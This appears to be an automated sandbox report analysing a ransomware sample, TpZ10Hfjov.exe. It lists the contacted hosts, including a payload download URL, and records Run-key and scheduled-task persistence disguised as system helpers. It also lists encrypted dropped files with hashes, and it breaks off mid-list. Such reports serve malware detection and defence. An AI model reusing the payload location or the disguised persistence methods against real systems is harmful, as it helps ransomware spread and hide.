                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.youtube.comTpZ10Hfjov.exe, 00000008.00000003.738301997.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://api.2ip.ua/TpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://docs.google.com/spreadsheets?usp=chrome_app&authuser=0TpZ10Hfjov.exe, 00000008.00000003.738390594.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.google.com/chrome/static/images/cursor-replay.curTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://hangouts.google.com/TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://astdg.top/files/1/build3.exerundd2TpZ10Hfjov.exe, 00000008.00000003.737963616.00000000007F6000.00000004.00000001.sdmptrue
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://astdg.top/files/1/build3.exe1TpZ10Hfjov.exe, 00000008.00000003.684472749.00000000091A1000.00000004.00000001.sdmptrue
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://api.2ip.ua/geo.jsonTpZ10Hfjov.exe, TpZ10Hfjov.exe, 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://drive.google.com/?usp=chrome_appTpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high

                                                                                                                                                                            Contacted IPs

                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                            Public

                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                            187.170.252.73
                                                                                                                                                                            securebiz.orgMexico
                                                                                                                                                                            8151UninetSAdeCVMXfalse
                                                                                                                                                                            77.123.139.190
                                                                                                                                                                            api.2ip.uaUkraine
                                                                                                                                                                            25229VOLIA-ASUAfalse
                                                                                                                                                                            31.167.180.141
                                                                                                                                                                            astdg.topSaudi Arabia
                                                                                                                                                                            35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse

                                                                                                                                                                            Private

                                                                                                                                                                            IP
                                                                                                                                                                            192.168.2.1

                                                                                                                                                                            General Information

                                                                                                                                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                            Analysis ID:458803
                                                                                                                                                                            Start date:03.08.2021
                                                                                                                                                                            Start time:18:59:15
                                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 14m 46s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:light
                                                                                                                                                                            Sample file name:TpZ10Hfjov.exe
                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                            Number of analysed new started processes analysed:28
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • HDC enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.rans.spre.evad.winEXE@30/3@7/4
                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                            HDC Information:
                                                                                                                                                                            • Successful, ratio: 2.6% (good quality ratio 2.6%)
                                                                                                                                                                            • Quality average: 96.2%
                                                                                                                                                                            • Quality standard deviation: 6.5%
                                                                                                                                                                            HCA Information:
                                                                                                                                                                            • Successful, ratio: 84%
                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Adjust boot time
                                                                                                                                                                            • Enable AMSI
                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                            Warnings:
                                                                                                                                                                            Show All
                                                                                                                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                                            • Created / dropped Files have been reduced to 100
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.255.188.83, 23.211.6.115, 40.88.32.150, 204.79.197.222, 8.241.126.249, 8.253.145.121, 8.248.149.254, 8.238.85.126, 8.248.137.254
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): fp.msedge.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, a-0019.standard.a-msedge.net, audownload.windowsupdate.nsatc.net, 1.perf.msedge.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                            • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.

                                                                                                                                                                            Simulations

                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                            19:00:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe" --AutoStart
                                                                                                                                                                            19:00:09Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe s>--Task
                                                                                                                                                                            19:00:13API Interceptor1x Sleep call for process: TpZ10Hfjov.exe modified
                                                                                                                                                                            19:00:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe" --AutoStart
                                                                                                                                                                            19:00:31Task SchedulerRun new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                            IPs

                                                                                                                                                                            No context

                                                                                                                                                                            Domains

                                                                                                                                                                            No context

                                                                                                                                                                            ASN

                                                                                                                                                                            No context

                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                            No context

                                                                                                                                                                            Dropped Files

                                                                                                                                                                            No context

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\SystemID\PersonalID.txt
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:MM7zcQTvTyFRTRn:MM7zcQjeFnn
                                                                                                                                                                            MD5:7E53A3CDFB9CC085AF06A93741550686
                                                                                                                                                                            SHA1:E786367548990DEA7B0673C9DC04CA6CB7345AEF
                                                                                                                                                                            SHA-256:9057D0490875783464A3FAED729415900FFD81E531AE4D7E8E4A157E6BD1C68B
                                                                                                                                                                            SHA-512:F1ED22AE5357964C1A856B9DE87956D72AC0C841F202B3377AF6785D6C459F05982D12F744FF1F8CBE60DBAE3C248939C1B0DC90051947487C8B51E030E769C0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: 42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9..
                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:aAgRTBpCiJ8mQPjAULswS2gj0vgXm2gcn3scii9a:9iJ1QbAmcG0mLE3sbD
                                                                                                                                                                            MD5:ADDDE496869D76407703DBFF878C7A44
                                                                                                                                                                            SHA1:B8808D09F3316369E97FCAF249B3408F40802C38
                                                                                                                                                                            SHA-256:790462696C9822998B8F68337A2884902F2A8DD676F89E7F3D05E2891665595F
                                                                                                                                                                            SHA-512:681BC9BAA07BCA77C0FCFA297193F61E8D545E4EE42BB77AC61AD99FF72480E7F57B0ED3B00B91D06ADED154E89BD6EA32016F0D567C19F70351814853C8935B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ..J...i..)...L..t9.p6..pj.n.#.g..\......>v...@..,.+......|{j.v.8.....J..G..._.2.;.(.EQ45.9...c..&..VY..i.K..].w..'$......_.q...W...8..F..K.r.Ej.C...q...&k........g8d.....W"..q......8)/a.w....~..!.4........5.0..`.."J.Z.)dr.x......K..m.oE5r....C.T+.0q.U&.....0bj"....?.*...wH.{g./.y.0H~..%aL.g.Q....o5.......+.h..BR...'M.5.E6..S_..m+<Q*.....D..tkm..{.!....vJ.042oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\LDNO2FU4\www.msn[1].xml
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:EAqXDUNNwhCz9r4CRng+mERt+Be4cnVTameU6+8iuEro8HzcQjeF3scii96Z:p5Nf4ClhmrBeRnhf6KE8Tcn3scii9a
                                                                                                                                                                            MD5:DCFBB1CF92191D65FC0B61EF338D4305
                                                                                                                                                                            SHA1:29F6A9F1824F0FE86F5108A4EDE9D1E21ECE87C4
                                                                                                                                                                            SHA-256:291C4DC453D43832F078E4C2C731CF34A7F9FCD005C469CEB45B112B0F4E9934
                                                                                                                                                                            SHA-512:FFCB4DBB4AD1E5AC335391901D2BD114EFC2AF57B0996D96603178E3195809D3053840EF99B6C641B3AA7433A22E78CC845BC08F93D68FAE7A05E653833C710A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: "...5...Oe...G......#.S.e..p.>...[.g.p.F.K6...:..h.,..}....I.....%.....Z..5..!e.p.Q.}....$._D...(Y..z..n.wl..2..=V..K..-...e>/.....t.:.T|'.)+.....gL;..Cz^.."~.H.!..1...IBZ.)......<,:..0.O..C...1(...TbU#.\.z(.....K..)`........@?.@.....k......S.{oU.42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:jE1emwgrvYkb1J1lU9MDnXRyBDopdrN8lcgIqkCgTessVEwxKA8B4iPvZNyTE3sX:jEAmwEfIe1yBDeucgGTTaEwctSipoT7D
                                                                                                                                                                            MD5:384349790F55DA1DA73803EA3F0D36C1
                                                                                                                                                                            SHA1:164F07E7295B855CA23D45FD2CC3D6845C232AA2
                                                                                                                                                                            SHA-256:CC3BFFBB42C44D8AD89B130D5F342CE5D1C2C836F9C6F73C346F78D764488BFC
                                                                                                                                                                            SHA-512:9B389A388E94EEAFAE23BB25420515E32988A31D2AA0F0CD78EA487D8401A96D3DE0F285AC77298BEF036FCC0BEAEFDEE41176D9254AF3B9E3870D82E8E687B3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: f....X%..y...r...p....{....a.+k..+{.H..#k..s...k.[~k5s.!KD.K.&<.aOQ.E..CAg..x..w..+;.6M.P^v. .(".TV~..Y..Of...zt......wQ.5....h......#)[..HE......JN...QN.]mL..|..4......C.s.LI..q....... ...........P.L..H..Z.q.;CJP....H.P....D*.l..A........3p. fG/...C.T..L....=9=Y~.. ..0.._..X.j.T..-Bk.y..h.._.*.u.k.B.k...}r.W.,p.......-...b.IC.a...B........t..~..p..^TNu.`..q/.0C..d.&.L,z.?....y.tD.Y..j...?...s....'............+."q.?|.fX.m./0%.Y.D...D...Q...X..@.;YRt.....9`......I.9.+..t.B.^.f..G.J...O...g9.00..q..x.>MRJ8.X....vd...../...."..W...k.>..x...f..[.<.R.....*.....g.;o1,!..Zp.#t..`.)...q.....X...r.O.."f.g.,..!...... ..C$.A...f..D...E..\..7l..|..a.Tr...Q.s.D..K~.C..w.0....t....2...L".........#..;<?s...5..../....cH-...d1Z.(Uz....y.U4..!.~f!.j..aA....Y...$j...;l.7....h..W..........\CC.b.......X..B%.4Yh.!.,...b}...z.a.uEeEB......9.'.o...c....Rh.q.r...._U...#jR...I...3l.\.Y{9...u.!1.9.8..==.og}R..{7.x..;..eb.0pCvF.{&N.K.........^F..c[4..E.m....
                                                                                                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:O7xzK9CiN4Ux846uW4iyfX5PWnBrCrNHTL2P+sXJXSNZ95836p:O7Ukivx84UDyfX5532P+iAj/83K
                                                                                                                                                                            MD5:7B6200A71006ED215C04C1B33FC03086
                                                                                                                                                                            SHA1:CECD4C9162C67002DDB1AD14165F601AC2D1D38C
                                                                                                                                                                            SHA-256:0AAEF234E3797EEF243A7198E4704019098B92B903281C1DFEC5C98E74CFAF07
                                                                                                                                                                            SHA-512:6BDDD837DF28B73D920E692BD83798594533D79DEC54AFBFEAAF286139FD30ED36F3AA50A0697FF69492297514E13BF23A01A0B8F8CD25327FD581D3D61F12BA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: C.p.......u<T#/8.X."u9.OM.gX.r5..@*.0........$.f.......U.....A3..^%y.f......|...............tn'.......m.%[..n.9Y..R....a.lMTL..4......W.S.I..6..sb.....5.'~*...{^Y.<"...r5)#2r..<3. l'_.n.......x..hK.B..G2.o.]...3P.....M..Lr......p3.'..%a!Y^..v..Wu.wVu..'g....}'..\..q..4......9.*........M...m.m...,.2._(.$.b.W...!y.#zv..G.........I*.~.....\w.n...gvn..@.w...L.....1..m..:.}]....%ky...ks..<.eo...@...LBe..5Pg..Qf.Mf.<>......Cv.*.......7...@t?.K..}....N.v.MzI'......<.;gS.^JH..LxA.K`8..B!.P.BA.g"..%`~.......>.KT.D{.r.SW...m..8V.+0.mJz..F.;EQ.r..DB@.e.....)...........%...~..>-..m....b..n...:...............F.O..*1...#..&.....&.[...AV.&V.......G..%2.....P./.l...^.......a..{\.$.h.m#..8.3...K..v7o>.z....J...o..w..w-....ms'>.D.w.z..gv....W....|.yAt........?...q.b...dF8..+..J........S...q..K.kuS.....L.[r8..2c.s...}.|...x..H..S2.......?....6yLP..........I....-l.....#a.#...K....MZ6O....w..n.=....7N....,..y.)#..H.....|.....C79.Q......-.+....?..SvA
                                                                                                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:r4kemg30jQTvZj5v5uHInEQTj21oZqi8IumyVhMT4N2prAmVftH6:EkerQENQEZZQBzMs2KIM
                                                                                                                                                                            MD5:C049B81C278EAA98CAAD55E72B8D859C
                                                                                                                                                                            SHA1:F3DE5D4C76FA0BEF66E4A910C0E5D3CFED0703A5
                                                                                                                                                                            SHA-256:07478E35E51EA08CFD53916D060DC364084530B5A60D53C4D5DE1D33E2E41137
                                                                                                                                                                            SHA-512:25A081AB907F284A139D292590C06692ADBD0E87A16507DAE7B948D430C951DB775EECE6C245ED0FB35D1B4AE407C6CA9F4AF0BFF42374855DF9CA0E8543423C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: .........R...+/.p........ABu....(.]...e.qG.$.]...8...Ac...)...g.. _.!.a.h...f....DX"l)....p.8....|ZS..j....E.7M.K..m..."......n.rL#.U0u@....|2'..mb,,...~Myn...%.XP5.F..c..S....Mq;....@vX....k.g'......BZ:....hwj...4"..9MZh...,..Bf....dD..<_...g...9.`....b....J.[f..F.....-P.X.p...Y..ig.K.-..L...+_.....r...h.s.p........;7g.JA"w...z.......(..e.. ....4.....b.K.,.E..C.H,. ..V......m.......a.X...*,qA.et.....Q..$....g0.5........1.Y.x.5..-.H....Z)...D.J.*`.^.i.e...<.[.:...H(C3t^..w..d....?-....%~.0I..K.n..}q.ZY.`_.......f|+.|.....B_..3*.K..5.....+Cus4.....k..6KrYo.........f.....I.4.44d.c.{..(..!.4I..f ..A...Ghd..^,..H....]3.,.|.~ .A.{tG.tS...zGE.....Y......Tn..j.J..Q..F.......'m.........g.yP...? ....B..36x.mw...1'.Ym.pc-.Xyn..T.,.o..e.i...,.EK..1.....]j0..j......,....#.!.?.`e`...(..<..q...CO.Y'.<..X[.Q.....#Z...cvW..kN|yW`.p9ui....*....BF!$...P #..u.*.*.#1....&%-..y....rI....M....d...o..\.1$c...>H..I...c.{.j..&.s.US.Y.......#...m..&..:7-*...j.H.
                                                                                                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:SQ8fXTWGP4uuBIYHbarwsfXi//5cW0l8qqzMJN8UJY3V0ChRjb:yv1PsBIY8XwxcW48Twd8J
                                                                                                                                                                            MD5:C9DF5D0BB1D64C0FF3575CE3E25D90A3
                                                                                                                                                                            SHA1:1EBE1C13179890BE4648A96CDA351247E03E2E8B
                                                                                                                                                                            SHA-256:7B1EBECCF4B4FBDB3B00349B15AE58CB61452E87D38A5DA2F1FB6F698A41F353
                                                                                                                                                                            SHA-512:C9A6D4B907D2A6EEC6B1B81E8CA484F61D47375BF7FDEDB6166F1CC54C3251A0DDA8E2E91374A51A2CD529D11F086B850802121FC1C5E5BFE4BB424B28F9C0AC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: CL'.h.FO.p.@|..E.Q.\....4..'.r.......V.1..; .A..3..8..L..O......~.^..z...&....s^-.F.dgod6..Q...P.....X/M^.&g..>.^....'..I..c.P.%..k^.....s..fF..'.*./&K..........R..R.....=Z.f..#..&Nm.).._...s.3x..!..w.U..iRE.4.q....s./."..x..n?.G~Hx..)"..._.:.a..8~.........J].w.Tm.[....?..KRn.N....W.....5..."+P.3..Yb.xN..'..[........."kR.*......D...w...J.h..3....>&(}IV.)....g{1?...R.M...*.|...o.F.U.t*.....,...!Yf......y8./)...,$.d..s....;{Up..O.k...k..3...........W......[.H.%TU....<....\B..;[.d../.....&..=.1...@i.a./B..5...b....t.W...na+.P.~z..].&..c..U..vQ.ZTp.*.;hw.KS3..7.X.DZ...+.R.O..#VPR.85..u..U......C.$jR..sb...1.S.+.54.m.A.I....N...9......9.5....k.AC&.. t.;I...]UM... .D+o..&..K..2j..D..H..[v....R.z!.]F...{U....:.$K..c..P.B.%....0.n.2.$9...K.~.e..%.-.......C;...j...o.qu..4&....."...Zlw....k..i.N... 0....:......d.ND+.d.;.".#*.....wD.N...'.?cM\.x........n...n...M..<....X.@5.;.o..r[.;..nQTvF.T.q+..#46.W...[......E.2...7....^E...a.np.....2>.}.
                                                                                                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:hCPTvyF6UjHb9enNEDpA7rH3s+4+17/tyjvPUQP1CBWAHT:hc6l/UnNuGvFZ72vsQMBtT
                                                                                                                                                                            MD5:0A3ACCBC7CD34635E775718DCBDA06DD
                                                                                                                                                                            SHA1:E02FFDEE602F98C68AFC54D484CBFAF0B737CF9C
                                                                                                                                                                            SHA-256:B4126366A91D66C3C82F31044D0CB149B91A4FF0163869ACDA42858BA5218972
                                                                                                                                                                            SHA-512:8F78501040EF52F8648DEC1E2C878CDA385C804511C03CDE22D04821F005E92443814788E6EF9A96FCF1F2D9EF4C5E19E6B8BD46153AB62B147269497C2C71DD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ..n..4..t..s.<..5V...sK.........{.X.i.e..rk...j.3.H..I.=`]H4......p....-..`.'S..^3}l.i.w[;..+9.O(.Y.Q:..^.fz.v/......"`.?%.Q.BA.....W..U..S....Q.+$Z.....6:W.97..{.......W.)%....wV-.G..]h4..Q.....(!...]....3h..lJP....{.6.$.|.%Q....R....p..h.u.....^..$.X....k...-ey..HlB..n,...?...U.......MJ43.........?.d)]...:.....hC..'+n...&7..I........(....4....[..}e...A.%..m.5j.!..o......O@.S5.~...S./....i.4.t..Y.+'+...<.2;..g..0d$.9..b...O.nO.6](.+L^.Z......0..9E...h.F......-o..3(...S...`.u......Sy..kO..L. ..G..~#U..)".d.w.'$,m.:...*.p.......5.h..}.UG6..Hi.x....j!*!...$....Xt..Gq..J.....%Oe...g!....1.y..J.vS.7...LOTu.SF...:..?...aN$..[2B.S....2.8v[..qY].e>F.F....vi.oH....l.;("hAr.f0....j0.s..t`.Gm.....C...>.......Ey.Y...R.{{8.....P..s.....!:.#97P.\.(....N.@.....A.G........#...3LYQ.Gt.}L.Kp.8NX....Yq..$..L.$...$......G.W..,.tW...8-....Gcth~...............g....}8L.9`..xA.Y......(..S..X....J..../VT....^......AG<K'q.k ,....[@>|.9=/`.Xpz|....q'...).........3..
                                                                                                                                                                            C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:iHqdy7iF/8qY7xRrc9MHkOetSbdtAoDiVE3sbD:iHqQOJY7xROvOjk7D
                                                                                                                                                                            MD5:122E19E6217AF8E99A66CEF407130231
                                                                                                                                                                            SHA1:0A20EA1DD945EBC33999A531EEA70A8400D299B1
                                                                                                                                                                            SHA-256:7388CAFE4A5982943FB7C0723EE88F07A4C09074ECD670ADC92B27227484D95F
                                                                                                                                                                            SHA-512:DE47AA98C6D8035F0345F7B202FCA6456C1660747BB92FF71B321DD3FD73E7F2DF119FB1C81E2FFEC8554370C401E9E171EA670A207140FE43C5A19AAC120E49
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: .vu........>8.$...!...Z.].z.p...t.k...Qz.{.>....A..h?`2a.....l...u....M....Q.L6b..f..E....[.....M.Yb...*x....Y. (..D.....S..-.B..S.\F^..L.LcvU.'..3.....8.p...T.....p.Q..'x..2..K..B.ZQ.}....f...|Z...G..c.^E..J.hW.N....H@..J<.8.J.]a./..j0t.(7F.Y\.p.2.'..^j!.T......r.".,...$T...4..s.L.-N.z5..t...g....+....52..9E...y.....C.e.l..Z....j....5..,s..L...h.!{,hN..h....24..x{...F...%.JU.......u...h...M.s.j..53u.......6.Y.ru.!...)...k.x.2.'.`.<W..VZL..iO_....".S........Q.[p.....f.."^. t..V.3.3.V..[-].._#.H.$.I)sG...M..8P..eQ>_.H...o.Ks.....K..h....~..4...o_).y;.j'.E^.b..{.\/.....t......`ORi.1.............k.Ly>q...a]..T.4.1..d.;..oix..&...U(m. .+X)u.Y1..7.../...L..#.`3Wm.T.tX..KT/q..bK..OV'.?..M.........N...2.......w=,.Gl/..Ays.(....2.T.....b~.W.. .....E[.5z.Q...<..t..A1.;...).....3.3....sD.m...........$....42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):0
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:Z/glxZoHzHVUb34+3cXBSRBfsZs2KLMnx1LHs7AU1XYfq0JjuA20MVy:ZIU2L4ycXBAsOAnxBHw91XwmA20Ms
                                                                                                                                                                            MD5:388DBC9D6A0F2A8EC985E45390FB9E27
                                                                                                                                                                            SHA1:08676837FFFB2852792C0E237AC3A011FA71203A
                                                                                                                                                                            SHA-256:68E2CD0C06A875A8C35A402B2665B073E1FE239B3CA1121DD0BC17421031E34B
                                                                                                                                                                            SHA-512:BFB8A1D0730DD64CCFF23D6D37A7CF2C7C630D055777D65DE9A1860E30F197BF76917B1D4D75CBC281FC946294A84619B7ACBDEBA2F112E9CDBF179E22BAF3D5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                            Preview: ej...kyzF......z........%....iU.$.S{..O.........f.._.u[..X.).Mw.^..fh......(,...4..l..`....|.IV.W#.....).D..w...c`..q.[n.u.&N;.....;.'iW..G.-.\.j.W.,;../.y.V..S...@...`j....1.[.z..Zma.O.Fj.!.S...}W8..a]]...A.le.....O&...-....k+.*oL`.?.).rYl.0.[...C].. .^.2...p8.Y..y..mj..t.......~.w.z.1!.k.bs.T...C......!.4OY4.]#../..%...7(.g8."....'.P.:....K.>..>..M..Q9....9L.R]Y....FX[.!.....D`.$W...z..Y.......K.>.e.....`.g1.bhgT...$..........L.._J....Iif..8.5.90.B.`.....F.(.....C...r.v4..3U.7>.t../..PN.@R....?'.....].....#x...a.......)y.I.....`a.....Sk.....\....U....\..b0.1&....%u..jL.......h.Z.U.].[s2.z....O....>.._U.....5=26..!5r....7"T...<|`....f.41..D..........Ll.$./.8~,VU7.....XG..L....W.7{S...Y#......[%C.N.C..[W.7...v...#v.h. ..:........[<^..~.E..... ..d...Mm..l.......I:Aj.s..".I...:........>|jSeP.K.7 ;.@.b..<..%.A4J(~.y..Og54.M..\B/.L;.U..b..Ot..6:\..s.|..CF..S...q?.c.G>./...G..t../{...(.%.'.u.....3.[.JQe/.@.vl..X........@......dq.G..D..
                                                                                                                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx
                                                                                                                                                                            Process:C:\Users\user\Desktop\TpZ10Hfjov.exe
